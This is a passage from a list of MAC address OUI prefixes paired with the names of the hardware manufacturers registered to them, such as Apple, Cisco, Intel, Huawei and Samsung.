TECHNOLOGIES CO.,LTD 085BDA CliniCare LTD 1CC035 PLANEX COMMUNICATIONS INC. 34543C TAKAOKA TOKO CO.,LTD. 1866DA Dell Inc. 583277 Reliance Communications LLC 248A07 Mellanox Technologies, Inc. 9C9D5D Raden Inc DC4D23 MRV Comunications 0023B3 Lyyn AB 402E28 MiXTelematics 6C8FB5 Microsoft Mobile Oy 008E73 Cisco Systems, Inc 0015C1 Sony Interactive Entertainment Inc. A09D91 SoundBridge 40B688 LEGIC Identsystems AG 9CD48B Innolux Technology Europe BV 90A62F NAVER C0C522 ARRIS Group, Inc. 1C9E46 Apple, Inc. C4E510 Mechatro, Inc. 18A6F7 TP-LINK TECHNOLOGIES CO.,LTD. 00351A Cisco Systems, Inc 00AF1F Cisco Systems, Inc 803896 SHARP Corporation 0060EC HERMARY OPTO ELECTRONICS INC. C0CCF8 Apple, Inc. 9C4FDA Apple, Inc. 8489AD Apple, Inc. AC3A7A Roku, Inc. B83E59 Roku, Inc. DC3A5E Roku, Inc. 001A73 Gemtek Technology Co., Ltd. 00904B Gemtek Technology Co., Ltd. 001A7F GCI Science & Technology Co.,LTD 00180F Nokia Danmark A/S C8979F Nokia Corporation ECF35B Nokia Corporation 544408 Nokia Corporation 3CC243 Nokia Corporation 0021FC Nokia Danmark A/S 001F5D Nokia Danmark A/S 001F01 Nokia Danmark A/S 001BEE Nokia Danmark A/S 001979 Nokia Danmark A/S 0025D0 Nokia Danmark A/S 0024D4 FREEBOX SAS 347E39 Nokia Danmark A/S 00507F DrayTek Corp. 647791 Samsung Electronics Co.,Ltd 9CE6E7 Samsung Electronics Co.,Ltd 9C0298 Samsung Electronics Co.,Ltd 28987B Samsung Electronics Co.,Ltd 54FA3E Samsung Electronics Co.,Ltd 0C8910 Samsung Electronics Co.,Ltd 78ABBB Samsung Electronics Co.,Ltd D8C4E9 Samsung Electronics Co.,Ltd BCD11F Samsung Electronics Co.,Ltd F4428F Samsung Electronics Co.,Ltd 0090A2 CyberTAN Technology Inc. 0090D6 Crystal Group, Inc. 446D6C Samsung Electronics Co.,Ltd 00F46F Samsung Electronics Co.,Ltd 0C715D Samsung Electronics Co.,Ltd 9C80DF Arcadyan Technology Corporation 002308 Arcadyan Technology Corporation 880355 Arcadyan Technology Corporation 34BB1F BlackBerry RTS 406F2A BlackBerry RTS 7C1CF1 HUAWEI TECHNOLOGIES CO.,LTD 78F557 HUAWEI TECHNOLOGIES CO.,LTD E02861 HUAWEI TECHNOLOGIES CO.,LTD D0D04B HUAWEI TECHNOLOGIES CO.,LTD 480031 HUAWEI TECHNOLOGIES CO.,LTD D476EA zte corporation 00175A Cisco Systems, Inc 0896D7 AVM GmbH 506A03 NETGEAR 100D7F NETGEAR 504A6E NETGEAR 4C09D4 Arcadyan Technology Corporation 18C086 Broadcom 001018 Broadcom C8FF28 Liteon Technology Corporation B81619 ARRIS Group, Inc. B077AC ARRIS Group, Inc. FCB4E6 ASKEY COMPUTER CORP 00192C ARRIS Group, Inc. 00195E ARRIS Group, Inc. 001A1B ARRIS Group, Inc. 001A66 ARRIS Group, Inc. 001A77 ARRIS Group, Inc. 64ED57 ARRIS Group, Inc. A4ED4E ARRIS Group, Inc. 00211E ARRIS Group, Inc. 002180 ARRIS Group, Inc. 001BDD ARRIS Group, Inc. 001D6B ARRIS Group, Inc. 001DBE ARRIS Group, Inc. 0012C9 ARRIS Group, Inc. 0023A2 ARRIS Group, Inc. 0023ED ARRIS Group, Inc. 001B52 ARRIS Group, Inc. 001E8D ARRIS Group, Inc. E0469A NETGEAR 30469A NETGEAR 002493 ARRIS Group, Inc. 002641 ARRIS Group, Inc. 0015D0 ARRIS Group, Inc. 001596 ARRIS Group, Inc. 04E676 AMPAK Technology, Inc. 0022F4 AMPAK Technology, Inc. 001DBA Sony Corporation 0024BE Sony Corporation 000FDE Sony Mobile Communications Inc 0CFE45 Sony Interactive Entertainment Inc. 2016D8 Liteon Technology Corporation E063E5 Sony Mobile Communications Inc F8D0AC Sony Interactive Entertainment Inc. 2421AB Sony Mobile Communications Inc B8F934 Sony Mobile Communications Inc 8C6422 Sony Mobile Communications Inc 20E564 ARRIS Group, Inc. 90B134 ARRIS Group, Inc. 40B7F3 ARRIS Group, Inc. 001B59 Sony Mobile Communications Inc 002298 Sony Mobile Communications Inc 0017E2 ARRIS Group, Inc. 001675 ARRIS Group, Inc. 000CE5 ARRIS Group, Inc. 0003E0 ARRIS Group, Inc. 00D0C9 ADVANTECH CO., LTD. 6487D7 ADB Broadband Italia E0B2F1 FN-LINK TECHNOLOGY LIMITED 0C4C39 MitraStar Technology Corp. 74888B ADB Broadband Italia 008C54 ADB Broadband Italia 00247B Actiontec Electronics, Inc 0004E3 Accton Technology Corp 0010B5 Accton Technology Corp 001974 16063 E8617E Liteon Technology Corporation 18CF5E Liteon Technology Corporation F0272D Amazon Technologies Inc. 84D6D0 Amazon Technologies Inc. 18FE34 Espressif Inc. 38229D ADB Broadband Italia A4526F ADB Broadband Italia 605BB4 AzureWave Technology Inc. 64D954 Taicang T&W Electronics 5C36B8 TCL King Electrical Appliances (Huizhou) Co., Ltd 00AA01 Intel Corporation 985FD3 Microsoft Corporation 00DA55 Cisco Systems, Inc 18E3BC TCT mobile ltd CC1FC4 InVue 00AA00 Intel Corporation 00C2C6 Intel Corporate 5CD2E4 Intel Corporate 28B2BD Intel Corporate 002243 AzureWave Technology Inc. 00006E Artisoft Inc. 448723 HOYA SERVICE CORPORATION D86C02 Huaqin Telecom Technology Co.,Ltd 60BEB5 Motorola Mobility LLC, a Lenovo Company F8F1B6 Motorola Mobility LLC, a Lenovo Company 3CFDFE Intel Corporate A4C494 Intel Corporate 902E1C Intel Corporate A434D9 Intel Corporate 685D43 Intel Corporate A0369F Intel Corporate 64D4DA Intel Corporate 4025C2 Intel Corporate 502DA2 Intel Corporate 78929C Intel Corporate 843A4B Intel Corporate 5C514F Intel Corporate A44E31 Intel Corporate 4CEB42 Intel Corporate F81654 Intel Corporate 606C66 Intel Corporate 4C8093 Intel Corporate AC7289 Intel Corporate 448500 Intel Corporate 0CD292 Intel Corporate DCA971 Intel Corporate 58946B Intel Corporate 0024D7 Intel Corporate 0024D6 Intel Corporate 001DE0 Intel Corporate 4C79BA Intel Corporate 84A6C8 Intel Corporate 5891CF Intel Corporate 0C8BFD Intel Corporate 00215C Intel Corporate 00216B Intel Corporate 0022FB Intel Corporate 001517 Intel Corporate A0A8CD Intel Corporate 5CC5D4 Intel Corporate 001E64 Intel Corporate F4F1E1 Motorola Mobility LLC, a Lenovo Company 9CD917 Motorola Mobility LLC, a Lenovo Company 9068C3 Motorola Mobility LLC, a Lenovo Company 3C197D Ericsson AB B4E10F Dell Inc. 002219 Dell Inc. 0024E8 Dell Inc. B083FE Dell Inc. 3417EB Dell Inc. F8BC12 Dell Inc. 18A99B Dell Inc. 001372 Dell Inc. 001143 Dell Inc. 4C7625 Dell Inc. 44A842 Dell Inc. 00253C 2Wire Inc 34EF44 2Wire Inc B0E754 2Wire Inc F01FAF Dell Inc. 00188B Dell Inc. 000874 Dell Inc. B8E625 2Wire Inc 001D5A 2Wire Inc 1C4419 TP-LINK TECHNOLOGIES CO.,LTD. 5C353B Compal Broadband Networks, Inc. 28FAA0 vivo Mobile Communication Co., Ltd. ECDF3A vivo Mobile Communication Co., Ltd. F42981 vivo Mobile Communication Co., Ltd. 84F6FA Miovision Technologies Incorporated 70106F Hewlett Packard Enterprise F8E71E Ruckus Wireless 08863B Belkin International Inc. 247C4C Herman Miller E46F13 D-Link International 2C56DC ASUSTek COMPUTER INC. 003146 Juniper Networks 00604C Sagemcom Broadband SAS 001F95 Sagemcom Broadband SAS 002348 Sagemcom Broadband SAS 002691 Sagemcom Broadband SAS 988B5D Sagemcom Broadband SAS 90013B Sagemcom Broadband SAS 7C034C Sagemcom Broadband SAS 6C2E85 Sagemcom Broadband SAS 94FEF4 Sagemcom Broadband SAS 34B1F7 Texas Instruments 2CFD37 Blue Calypso, Inc. 0C6127 Actiontec Electronics, Inc 3CD92B Hewlett Packard 78DEE4 Texas Instruments 001833 Texas Instruments 001834 Texas Instruments 0017E3 Texas Instruments 001830 Texas Instruments 0023D4 Texas Instruments BCF685 D-Link International 78542E D-Link International C4A81D D-Link International 002191 D-Link Corporation ACF1DF D-Link International C0E422 Texas Instruments D00790 Texas Instruments 3C7DB1 Texas Instruments F4FC32 Texas Instruments 90D7EB Texas Instruments 0017E8 Texas Instruments 001783 Texas Instruments 00F871 DGS Denmark A/S 2435CC Zhongshan Scinan Internet of Things Co.,Ltd. 2C3033 NETGEAR CC46D6 Cisco Systems, Inc 0041D2 Cisco Systems, Inc 2CAB00 HUAWEI TECHNOLOGIES CO.,LTD A8CA7B HUAWEI TECHNOLOGIES CO.,LTD BC4434 Shenzhen TINNO Mobile Technology Corp. 04BF6D Zyxel Communications Corporation F88FCA Google, Inc. 3898D8 MERITECH CO.,LTD 9486CD SEOUL ELECTRONICS&TELECOM 3897D6 Hangzhou H3C Technologies Co., Limited 1CA770 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 4419B6 Hangzhou Hikvision Digital Technology Co.,Ltd. 68DBCA Apple, Inc. 086698 Apple, Inc. BC5436 Apple, Inc. 044BED Apple, Inc. 6C8DC1 Apple, Inc. 84ACFB Crouzet Automatismes 7CBB8A Nintendo Co., Ltd. FCFFAA IEEE Registration Authority 0CD746 Apple, Inc. 60A37D Apple, Inc. 88A25E Juniper Networks 541E56 Juniper Networks 8896B6 Global Fire Equipment S.A. 88B8D0 Dongguan Koppo Electronic Co.,Ltd 601971 ARRIS Group, Inc. F8CAB8 Dell Inc. 001111 Intel Corporation 001302 Intel Corporate 6CCA08 ARRIS Group, Inc. 78719C ARRIS Group, Inc. D40598 ARRIS Group, Inc. E83381 ARRIS Group, Inc. 8C7F3B ARRIS Group, Inc. 5C571A ARRIS Group, Inc. E8892C ARRIS Group, Inc. 94877C ARRIS Group, Inc. 407009 ARRIS Group, Inc. 083E0C ARRIS Group, Inc. 3C36E4 ARRIS Group, Inc. 1C1B68 ARRIS Group, Inc. 000423 Intel Corporation 207355 ARRIS Group, Inc. F8EDA5 ARRIS Group, Inc. 5465DE ARRIS Group, Inc. 58AC78 Cisco Systems, Inc 780AC7 Baofeng TV Co., Ltd. 000D0B BUFFALO.INC 001D73 BUFFALO.INC 001601 BUFFALO.INC 7403BD BUFFALO.INC B8FC9A Le Shi Zhi Xin Electronic Technology (Tianjin) Limited A45D36 Hewlett Packard F0921C Hewlett Packard A0481C Hewlett Packard A01D48 Hewlett Packard 40A8F0 Hewlett Packard 8851FB Hewlett Packard 082E5F Hewlett Packard E4115B Hewlett Packard 28924A Hewlett Packard 288023 Hewlett Packard CC3E5F Hewlett Packard D89D67 Hewlett Packard 0014C2 Hewlett Packard 00805F Hewlett Packard 0018FE Hewlett Packard 001A4B Hewlett Packard 002481 Hewlett Packard 000F61 Hewlett Packard 480FCF Hewlett Packard D40B1A HTC Corporation 945330 Hon Hai Precision Ind. Co.,Ltd. A08D16 HUAWEI TECHNOLOGIES CO.,LTD 4CD08A HUMAX Co., Ltd. CC4EEC HUMAX Co., Ltd. 403DEC HUMAX Co., Ltd. EC4D47 HUAWEI TECHNOLOGIES CO.,LTD C44044 RackTop Systems Inc. 4CA161 Rain Bird Corporation 8CAB8E Shanghai Feixun Communication Co.,Ltd. FC64BA Xiaomi Communications Co Ltd 9060F1 Apple, Inc. F8D111 TP-LINK TECHNOLOGIES CO.,LTD. B0487A TP-LINK TECHNOLOGIES CO.,LTD. 940C6D TP-LINK TECHNOLOGIES CO.,LTD. A4516F Microsoft Mobile Oy 542758 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 00242B Hon Hai Precision Ind. Co.,Ltd. 08181A zte corporation 001E73 zte corporation 0015EB zte corporation 001C25 Hon Hai Precision Ind. Co.,Ltd. 00197E Hon Hai Precision Ind. Co.,Ltd. 90FBA6 Hon Hai Precision Ind. Co.,Ltd. 4437E6 Hon Hai Precision Ind. Co.,Ltd. CCAF78 Hon Hai Precision Ind. Co.,Ltd. F4B7E2 Hon Hai Precision Ind. Co.,Ltd. 647002 TP-LINK TECHNOLOGIES CO.,LTD. 10FEED TP-LINK TECHNOLOGIES CO.,LTD. 645601 TP-LINK TECHNOLOGIES CO.,LTD. F02765 Murata Manufacturing Co., Ltd. 5CF8A1 Murata Manufacturing Co., Ltd. 44A7CF Murata Manufacturing Co., Ltd. 0013E0 Murata Manufacturing Co., Ltd. EC26CA TP-LINK TECHNOLOGIES CO.,LTD. 9471AC TCT mobile ltd 2C088C HUMAX Co., Ltd. 1C994C Murata Manufacturing Co., Ltd. F4559C HUAWEI TECHNOLOGIES CO.,LTD 80B686 HUAWEI TECHNOLOGIES CO.,LTD 10C61F HUAWEI TECHNOLOGIES CO.,LTD CC96A0 HUAWEI TECHNOLOGIES CO.,LTD F80113 HUAWEI TECHNOLOGIES CO.,LTD A49947 HUAWEI TECHNOLOGIES CO.,LTD C8D15E HUAWEI TECHNOLOGIES CO.,LTD 785968 Hon Hai Precision Ind. Co.,Ltd. C07009 HUAWEI TECHNOLOGIES CO.,LTD 8038BC HUAWEI TECHNOLOGIES CO.,LTD C4072F HUAWEI TECHNOLOGIES CO.,LTD F48E92 HUAWEI TECHNOLOGIES CO.,LTD 00664B HUAWEI TECHNOLOGIES CO.,LTD 9CC172 HUAWEI TECHNOLOGIES CO.,LTD 247F3C HUAWEI TECHNOLOGIES CO.,LTD 581F28 HUAWEI TECHNOLOGIES CO.,LTD ECCB30 HUAWEI TECHNOLOGIES CO.,LTD F4DCF9 HUAWEI TECHNOLOGIES CO.,LTD 308730 HUAWEI TECHNOLOGIES CO.,LTD C057BC Avaya Inc 64A7DD Avaya Inc 241FA0 HUAWEI TECHNOLOGIES CO.,LTD 18C58A HUAWEI TECHNOLOGIES CO.,LTD 080028 Texas Instruments 405FC2 Texas Instruments E0E5CF Texas Instruments 68DFDD Xiaomi Communications Co Ltd 7054F5 HUAWEI TECHNOLOGIES CO.,LTD DCD2FC HUAWEI TECHNOLOGIES CO.,LTD 9017AC HUAWEI TECHNOLOGIES CO.,LTD 34CDBE HUAWEI TECHNOLOGIES CO.,LTD D8490B HUAWEI TECHNOLOGIES CO.,LTD 44322A Avaya Inc 7038EE Avaya Inc 703018 Avaya Inc 9C28EF HUAWEI TECHNOLOGIES CO.,LTD EC24B8 Texas Instruments 7CEC79 Texas Instruments 689E19 Texas Instruments 20CD39 Texas Instruments B4994C Texas Instruments A4251B Avaya Inc 646A52 Avaya Inc 00100B Cisco Systems, Inc 00173B Cisco Systems, Inc 04DAD2 Cisco Systems, Inc F02929 Cisco Systems, Inc 20BBC0 Cisco Systems, Inc 4C4E35 Cisco Systems, Inc 98FAE3 Xiaomi Communications Co Ltd F0B429 Xiaomi Communications Co Ltd 005080 Cisco Systems, Inc 005073 Cisco Systems, Inc 00900C Cisco Systems, Inc 00905F Cisco Systems, Inc 00E0F7 Cisco Systems, Inc 001BD7 Cisco SPVTG 006083 Cisco Systems, Inc 006009 Cisco Systems, Inc 00067C Cisco Systems, Inc 00107B Cisco Systems, Inc 0050E2 Cisco Systems, Inc E4D3F1 Cisco Systems, Inc 8478AC Cisco Systems, Inc 0090A6 Cisco Systems, Inc 009086 Cisco Systems, Inc 00248C ASUSTek COMPUTER INC. 002354 ASUSTek COMPUTER INC. 1C872C ASUSTek COMPUTER INC. 60182E ShenZhen Protruly Electronic Ltd co. C4143C Cisco Systems, Inc 3C08F6 Cisco Systems, Inc 001E8C ASUSTek COMPUTER INC. 0013D4 ASUSTek COMPUTER INC. 20CF30 ASUSTek COMPUTER INC. BC1665 Cisco Systems, Inc F872EA Cisco Systems, Inc D0C789 Cisco Systems, Inc F84F57 Cisco Systems, Inc 501CBF Cisco Systems, Inc B000B4 Cisco Systems, Inc 544A00 Cisco Systems, Inc 00E16D Cisco Systems, Inc 78BAF9 Cisco Systems, Inc 0022CE Cisco SPVTG E0D173 Cisco Systems, Inc E0899D Cisco Systems, Inc C47295 Cisco Systems, Inc 7C69F6 Cisco Systems, Inc 78DA6E Cisco Systems, Inc B8782E Apple, Inc. 000502 Apple, Inc. 000A95 Apple, Inc. 34BDC8 Cisco Systems, Inc DCEB94 Cisco Systems, Inc 84B517 Cisco Systems, Inc 1C6E4C Logistic Service & Engineering Co.,Ltd 000F66 Cisco-Linksys, LLC 24374C Cisco SPVTG 188B9D Cisco Systems, Inc E4AA5D Cisco Systems, Inc F45FD4 Cisco SPVTG 2CABA4 Cisco SPVTG 00264A Apple, Inc. 041E64 Apple, Inc. 001124 Apple, Inc. 002241 Apple, Inc. 7CC537 Apple, Inc. 78CA39 Apple, Inc. 18E7F4 Apple, Inc. 70CD60 Apple, Inc. 8C7B9D Apple, Inc. D89E3F Apple, Inc. B8C75D Apple, Inc. 0C74C2 Apple, Inc. 403004 Apple, Inc. 842999 Apple, Inc. 74E2F5 Apple, Inc. E0C97A Apple, Inc. 68A86D Apple, Inc. 7CC3A1 Apple, Inc. 7073CB Apple, Inc. 90840D Apple, Inc. E80688 Apple, Inc. EC852F Apple, Inc. 00F4B9 Apple, Inc. 5C95AE Apple, Inc. 9803D8 Apple, Inc. 60C547 Apple, Inc. 685B35 Apple, Inc. 2CB43A Apple, Inc. 689C70 Apple, Inc. 380F4A Apple, Inc. 3010E4 Apple, Inc. A886DD Apple, Inc. 444C0C Apple, Inc. B4F0AB Apple, Inc. 80929F Apple, Inc. 9C04EB Apple, Inc. 5C969D Apple, Inc. 609217 Apple, Inc. 84B153 Apple, Inc. E06678 Apple, Inc. 48D705 Apple, Inc. 041552 Apple, Inc. CC785F Apple, Inc. 88CB87 Apple, Inc. F0C1F1 Apple, Inc. 843835 Apple, Inc. 8C006D Apple, Inc. A8968A Apple, Inc. F41BA1 Apple, Inc. 60D9C7 Apple, Inc. 3CAB8E Apple, Inc. F82793 Apple, Inc. 907240 Apple, Inc. 908D6C Apple, Inc. B8098A Apple, Inc. 4C7C5F Apple, Inc. 68644B Apple, Inc. C81EE7 Apple, Inc. A43135 Apple, Inc. 68D93C Apple, Inc. 00F76F Apple, Inc. C88550 Apple, Inc. 7014A6 Apple, Inc. 985AEB Apple, Inc. 78D75F Apple, Inc. E0B52D Apple, Inc. 6C94F8 Apple, Inc. C0CECD Apple, Inc. F44B2A Cisco SPVTG 746F19 ICARVISIONS (SHENZHEN) TECHNOLOGY CO., LTD. 2CAE2B Samsung Electronics Co.,Ltd C4ADF1 GOPEACE Inc. 58FC73 Arria Live Media, Inc. 0C1A10 Acoustic Stream C4EF70 Home Skinovations 5CE3B6 Fiberhome Telecommunication Technologies Co.,LTD 7C5A67 JNC Systems, Inc. A0F9E0 VIVATEL COMPANY LIMITED C869CD Apple, Inc. A4B805 Apple, Inc. 90C99B Tesorion Nederland B.V. 5CADCF Apple, Inc. 080A4E Planet Bingo® — 3rd Rock Gaming® B49D0B BQ 3C8CF8 TRENDnet, Inc. E81363 Comstock RD, Inc. 741865 Shanghai DareGlobal Technologies Co.,Ltd BC6C21 Apple, Inc. F8C372 TSUZUKI DENKI D47208 Bragi GmbH A87285 IDT, INC. 780541 Queclink Wireless Solutions Co., Ltd 044169 GoPro C02DEE Cuff 6CEBB2 Dongguan Sen DongLv Electronics Co.,Ltd 3C7A8A ARRIS Group, Inc. F40E22 Samsung Electronics Co.,Ltd 881B99 SHENZHEN XIN FEI JIA ELECTRONIC CO. LTD. 544E90 Apple, Inc. A4A6A9 Private 8C10D4 Sagemcom Broadband SAS F898B9 HUAWEI TECHNOLOGIES CO.,LTD 5CB559 CNEX Labs B83A9D Alarm.com 6858C5 ZF TRW Automotive C01173 Samsung Electronics Co.,Ltd BCE63F Samsung Electronics Co.,Ltd 7C9122 Samsung Electronics Co.,Ltd ACBC32 Apple, Inc. 9023EC Availink, Inc. 441CA8 Hon Hai Precision Ind. Co.,Ltd. B4293D Shenzhen Urovo Technology Co.,Ltd. 54FF82 Davit Solution co. 50DF95 Lytx 9CA69D Whaley Technology Co.Ltd 5853C0 Beijing Guang Runtong Technology Development Company co.,Ltd 2CA539 Parallel Wireless, Inc CC794A BLU Products Inc. F4E926 Tianjin Zanpu Technology Inc. 906F18 Private 98CB27 Galore Networks Pvt. Ltd. E8F2E2 LG Innotek 247260 IOTTECH Corp 245BF0 Liteon, Inc. E855B4 SAI Technology Inc. 340CED Moduel AB 2827BF Samsung Electronics Co.,Ltd 94D859 TCT mobile ltd 2CFCE4 CTEK Sweden AB C0EE40 Laird Technologies F4B8A7 zte corporation 300C23 zte corporation C0B713 Beijing Xiaoyuer Technology Co. Ltd. 1005B1 ARRIS Group, Inc. 20635F Abeeway 083A5C Junilab, Inc. B8B3DC DEREK (SHAOGUAN) LIMITED 702A7D EpSpot AB 4CAE31 ShengHai Electronics (Shenzhen) Ltd 188EF9 G2C Co. Ltd. 44F436 zte corporation C47D46 FUJITSU LIMITED 185D9A BobjGear LLC F4E9D4 QLogic Corporation 4CB76D Novi Security 6CE01E Modcam AB 74852A PEGATRON CORPORATION 9CB6D0 Rivet Networks 40B89A Hon Hai Precision Ind. Co.,Ltd. 1CB72C ASUSTek COMPUTER INC. 40B837 Sony Mobile Communications Inc 4CEEB0 SHC Netzwerktechnik GmbH 800184 HTC Corporation 44C69B Wuhan Feng Tian Information Network CO.,LTD FCE33C HUAWEI TECHNOLOGIES CO.,LTD C02567 Nexxt Solutions A8827F CIBN Oriental Network(Beijing) CO.,Ltd D048F3 DATTUS Inc B8C3BF Henan Chengshi NetWork Technology Co.,Ltd 44962B Aidon Oy E076D0 AMPAK Technology, Inc. B008BF Vital Connect, Inc. D4522A TangoWiFi.com E807BF SHENZHEN BOOMTECH INDUSTRY CO.,LTD 84F129 Metrascale Inc. B89ACD ELITE OPTOELECTRONIC(ASIA)CO.,LTD D468BA Shenzhen Sundray Technologies Company Limited 086266 ASUSTek COMPUTER INC. 9C3066 RWE Effizienz GmbH 18BDAD L-TECH CORPORATION 60E6BC Sino-Telecom Technology Co.,Ltd. C8C50E Shenzhen Primestone Network Technologies.Co., Ltd. D06A1F BSE CO.,LTD. 700136 FATEK Automation Corporation FCA22A PT. Callysta Multi Engineering A45602 fenglian Technology Co.,Ltd. 94E2FD Boge Kompressoren OTTO Boge GmbH & Co. KG F01E34 ORICO Technologies Co., Ltd DCE026 Patrol Tag, Inc B40566 SP Best Corporation Co., LTD. 1CC72D Shenzhen Huapu Digital CO.,Ltd A89008 Beijing Yuecheng Technology Co. Ltd. 183864 CAP-TECH INTERNATIONAL CO., LTD. 6CF5E8 Mooredoll Inc. 8CBFA6 Samsung Electronics Co.,Ltd C8A823 Samsung Electronics Co.,Ltd B0C559 Samsung Electronics Co.,Ltd F42C56 SENOR TECH CO LTD FCDC4A G-Wearables Corp. 1C14B3 Airwire Technologies A48CDB Lenovo D85DE2 Hon Hai Precision Ind. Co.,Ltd. 3C912B Vexata Inc 346C0F Pramod Telecom Pvt. Ltd BC1485 Samsung Electronics Co.,Ltd 9C6C15 Microsoft Corporation 445ECD Razer Inc 4CA928 Insensi E8447E Bitdefender SRL C0335E Microsoft B0E03C TCT mobile ltd B0495F OMRON HEALTHCARE Co., Ltd. 60F189 Murata Manufacturing Co., Ltd. 742EFC DirectPacket Research, Inc, 84CFBF Fairphone ACD1B8 Hon Hai Precision Ind. Co.,Ltd. A0C2DE Costar Video Systems 88E161 Art Beijing Science and Technology Development Co., Ltd. 00A509 WigWag Inc. 7491BD Four systems Co.,Ltd. F0FE6B Shanghai High-Flying Electronics Technology Co., Ltd 3CAE69 ESA Elektroschaltanlagen Grimma GmbH D43266 Fike Corporation 900CB4 Alinket Electronic Technology Co., Ltd 48C093 Xirrus, Inc. DC0914 Talk-A-Phone Co. D0929E Microsoft Corporation BC52B4 Nokia 9405B6 Liling FullRiver Electronics & Technology Ltd 00F3DB WOO Sports 78312B zte corporation C81B6B Innova Security 3438AF Inlab Software GmbH B4A828 Shenzhen Concox Information Technology Co., Ltd 00A2F5 Guangzhou Yuanyun Network Technology Co.,Ltd 1008B1 Hon Hai Precision Ind. Co.,Ltd. E48C0F Discovery Insure E42354 SHENZHEN FUZHI SOFTWARE TECHNOLOGY CO.,LTD 94BF95 Shenzhen Coship Electronics Co., Ltd 44CE7D SFR 344DEA zte corporation 4C16F1 zte corporation 10FACE Reacheng Communication Technology Co.,Ltd 9470D2 WINFIRM TECHNOLOGY A44AD3 ST Electronics(Shanghai) Co.,Ltd 7CB177 Satelco AG CC3080 VAIO Corporation 587BE9 AirPro Technology India Pvt. Ltd 8C18D9 Shenzhen RF Technology Co., Ltd C4BD6A SKF GmbH C401CE PRESITION (2000) CO., LTD. 187117 eta plus electronic gmbh EC0EC4 Hon Hai Precision Ind. Co.,Ltd. 30FAB7 Tunai Creative 0809B6 Masimo Corp 4CF5A0 Scalable Network Technologies Inc D8FB11 AXACORE 4CE933 RailComm, LLC CCE17F Juniper Networks E4C62B Airware EC1D7F zte corporation AC3870 Lenovo Mobile Communication Technology Ltd. 4CBC42 Shenzhen Hangsheng Electronics Co.,Ltd. 70F196 Actiontec Electronics, Inc 188219 Alibaba Cloud Computing Ltd. 28A5EE Shenzhen SDGI CATV Co., Ltd D0A0D6 Chengdu TD Tech Ltd. ECB907 CloudGenix Inc F42833 MMPC Inc. 0C8C8F Kamo Technology Limited A4A4D3 Bluebank Communication Technology Co.Ltd A8329A Digicom Futuristic Technologies Ltd. F4D032 Yunnan Ideal Information&Technology.,Ltd 600292 PEGATRON CORPORATION B4B859 Texa Spa 5CF9F0 Atomos Engineering P/L 702DD1 Newings Communication CO., LTD. 147590 TP-LINK TECHNOLOGIES CO.,LTD. 50BD5F TP-LINK TECHNOLOGIES CO.,LTD. 987E46 Emizon Networks Limited 3C46D8 TP-LINK TECHNOLOGIES CO.,LTD. 4C83DE Cisco SPVTG A81374 Panasonic Corporation AVC Networks Company 083D88 Samsung Electronics Co.,Ltd BC4E5D ZhongMiao Technology Co., Ltd. 3C189F Nokia Corporation 7C6AC3 GatesAir, Inc 5C5BC2 YIK Corporation 30595B streamnow AG 84850A Hella Sonnen- und Wetterschutztechnik GmbH 08CD9B samtec automotive electronics & software GmbH 28E6E9 SIS Sat Internet Services GmbH F4FD2B ZOYI Company F4F646 Dediprog Technology Co. Ltd. 300D2A Zhejiang Wellcom Technology Co.,Ltd. 045C8E gosund GROUP CO.,LTD 7CC4EF Devialet D85DFB Private DCF110 Nokia Corporation 608F5C Samsung Electronics Co.,Ltd DC38E1 Juniper Networks 908C63 GZ Weedong Networks Technology Co. , Ltd E8EF89 OPMEX Tech. 109266 Samsung Electronics Co.,Ltd EC2E4E HITACHI-LG DATA STORAGE INC 3481C4 AVM GmbH 983713 PT.Navicom Indonesia A47E39 zte corporation CCB691 NECMagnusCommunications 40167E ASUSTek COMPUTER INC. F84A73 EUMTECH CO., LTD 142BD6 Guangdong Appscomm Co.,Ltd FCC2DE Murata Manufacturing Co., Ltd. 98349D Krauss Maffei Technologies GmbH 880FB6 Jabil Circuits India Pvt Ltd,-EHTP unit B46698 Zealabs srl 687CC8 Measurement Systems S. de R.L. 74F85D Berkeley Nucleonics Corp B061C7 Ericsson-LG Enterprise 0092FA SHENZHEN WISKY TECHNOLOGY CO.,LTD 4C7F62 Nokia Corporation 100F18 Fu Gang Electronic(KunShan)CO.,LTD D0C7C0 TP-LINK TECHNOLOGIES CO.,LTD. 4411C2 Telegartner Karl Gartner GmbH 8059FD Noviga 400107 Arista Corp 30C750 MIC Technology Group 18CC23 Philio Technology Corporation 407875 IMBEL - Industria de Material Belico do Brasil D881CE AHN INC. 28C825 DellKing Industrial Co., Ltd 80618F Shenzhen sangfei consumer communications co.,ltd D82A15 Leitner SpA 447E76 Trek Technology (S) Pte Ltd B0EC8F GMX SAS 28DEF6 bioMerieux Inc. 580528 LABRIS NETWORKS E0D31A EQUES Technology Co., Limited 987770 Pep Digital Technology (Guangzhou) Co., Ltd 68D247 Portalis LC 50B695 Micropoint Biotechnologies,Inc. B4430D Broadlink Pty Ltd A06518 VNPT TECHNOLOGY 7C8D91 Shanghai Hongzhuo Information Technology co.,LTD 748F1B MasterImage 3D 083F76 Intellian Technologies, Inc. CC89FD Nokia Corporation 34466F HiTEM Engineering 386C9B Ivy Biomedical B42C92 Zhejiang Weirong Electronic Co., Ltd A07771 Vialis BV 10DDF4 Maxway Electronics CO.,LTD 5CE7BF New Singularity International Technical Development Co.,Ltd 6C641A Penguin Computing 50A054 Actineon B48547 Amptown System Company GmbH 5056A8 Jolla Ltd E8E770 Warp9 Tech Design, Inc. 609620 Private C0F991 GME Standard Communications P/L D87CDD SANIX INCORPORATED 707C18 ADATA Technology Co., Ltd 14F28E ShenYang ZhongKe-Allwin Technology Co.LTD BC14EF ITON Technology Limited 080371 KRG CORPORATE 200E95 IEC – TC9 WG43 C8F68D S.E.TECHNOLOGIES LIMITED 3CD4D6 WirelessWERX, Inc 0C1262 zte corporation 78EC74 Kyland-USA 98DA92 Vuzix Corporation 387B47 AKELA, Inc. C064C6 Nokia Corporation E40439 TomTom Software Ltd D0C42F Tamagawa Seiki Co.,Ltd. 549359 SHENZHEN TWOWING TECHNOLOGIES CO.,LTD. 90356E Vodafone Omnitel N.V. 284430 GenesisTechnical Systems (UK) Ltd 5C1193 Seal One AG 783D5B TELNET Redes Inteligentes S.A. D0B523 Bestcare Cloucal Corp. 24A495 Thales Canada Inc. 847616 Addat s.r.o. DC0575 SIEMENS ENERGY AUTOMATION E097F2 Atomax Inc. 70305E Nanjing Zhongke Menglian Information Technology Co.,LTD C098E5 University of Michigan 50E14A Private 708D09 Nokia Corporation 98FB12 Grand Electronics (HK) Ltd 3C1040 daesung network 443C9C 